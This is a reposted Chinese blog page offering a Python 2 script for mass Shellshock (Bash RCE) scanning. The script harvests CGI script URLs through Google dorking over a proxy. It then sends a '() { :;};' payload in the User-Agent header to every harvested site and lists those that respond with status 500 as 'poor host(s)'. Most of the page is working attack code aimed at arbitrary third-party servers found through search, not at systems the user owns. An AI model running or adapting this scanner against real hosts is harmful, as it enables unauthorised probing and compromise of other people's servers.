首页 > 代码库 > Bash远程代码执行漏洞批量利用脚本

Bash远程代码执行漏洞批量利用脚本

2024-07-24 12:52:13   223人阅读

Bash远程代码执行漏洞的威力确实要比心脏滴血大很多,但是影响范围不是很广泛,不过昨天的分析文章Bash远程代码执行漏洞分析中末尾提到了这个漏洞的批量问题。
其中最最简单的方法就是使用搜索引擎的hacking技术,这里我使用的Google Hacking语法结合Google API来进行链接的抓取。只不过在国内的话。。。。需要加代理。
程序中的代理是我本地的goagent代理,端口是8087。如何检测漏洞思路也很简单,我这里直接根据服务器返回码进行判断的。

思路就是以上这些,下面还是和往常一样,贴代码:

#coding=utf-8
import requests
import json
import sys
import threading

class GoogleURLProvider():
	def __init__(self,pageCount,proxies):
		self.pageCount = pageCount #查询的页数
		self.keywords = r'inurl:cgi-bin filetype:sh'
		self.apiurl = "https://ajax.googleapis.com/ajax/services/search/web"
		self.proxies = proxies

	def getRequest(self,url):
		return requests.get(url,proxies=self.proxies,verify=False)

	def getUrls(self):
		ret_list = []
		tmp_list = []
		for x in xrange(0,self.pageCount):
			url = "{apiurl}?v=1.0&q={keywords}&rsz=8&start={pageCount}".format(apiurl=self.apiurl,keywords=self.keywords,pageCount=x)
			try:
				r = self.getRequest(url)	
				results = json.loads(r.text)
				if not results:
					continue
				infos = results['responseData']['results']
				if infos:
					for i in infos:
						tmp_list.append(i['url'])
			except Exception, e:
				continue
		ret_list = ret_list + tmp_list
		return ret_list

class BashRCEDetector():
	def __init__(self,urls):
		self.urls = urls
	def detector(self):
		vul_res = []
		useragent_header = {
			'User-Agent':"() { :;}; echo -e 'detector'"
		}
		for x in self.urls:
			try:
				r = requests.get(x,headers = useragent_header,timeout=1)
				if r.status_code == 500:
					print "{url} has Bash RCE vulnerability".format(url=x)
					vul_res.append(x)
				else:
					pass
			except Exception, e:
				continue
		return vul_res

if __name__ == '__main__':
	print 'Powered by:Exploit QQ:739858341'
	print 'This is a program which you can use to scan the BashRCE vulnerability\nScanner working,please wait....'
	if len(sys.argv) != 2:
		print 'Usage:python BashRCEScanner <google pageCount>'
		sys.exit()
	#goagent proxy
	#在这里修改,加入你自己的代理即可使用
	proxies = {
	'http':"http://127.0.0.1:8087",
	'https':"http://127.0.0.1:8087"
	}
	url_res = []
	vul_guys = []
	urlgetter = GoogleURLProvider(int(sys.argv[1]),proxies)
	url_res = urlgetter.getUrls()

	bash_detector = BashRCEDetector(url_res)
	vul_guys = bash_detector.detector()
	if len(vul_guys) == 0:
		print 'This group have no vulnerability'
	else:
		print 'Find %d poor host(s)' % len(vul_guys)

运行截图:



Bash远程代码执行漏洞批量利用脚本


联系
我们